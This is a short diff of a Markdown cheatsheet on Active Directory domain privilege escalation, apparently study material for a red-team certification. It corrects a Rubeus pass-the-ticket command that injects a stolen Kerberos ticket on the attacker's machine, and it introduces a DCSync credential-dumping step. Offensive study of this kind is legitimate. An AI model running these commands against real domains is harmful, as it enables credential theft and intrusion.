0xJs/CRTE-Cheatsheet/Domain-Privilege-Escalation.md

 ```

 ```
-Copy the base64 encoded TGT, remove extra spaces and use it on the attacker' machine:
+# Copy the base64 encoded TGT, remove extra spaces and use it on the attacker' machine:
-.\Rubeus.exe ptt /tikcet:
+.\Rubeus.exe ptt /ticket:<TICKET FILE>
 ```

 #### Run DCSync to get credentials: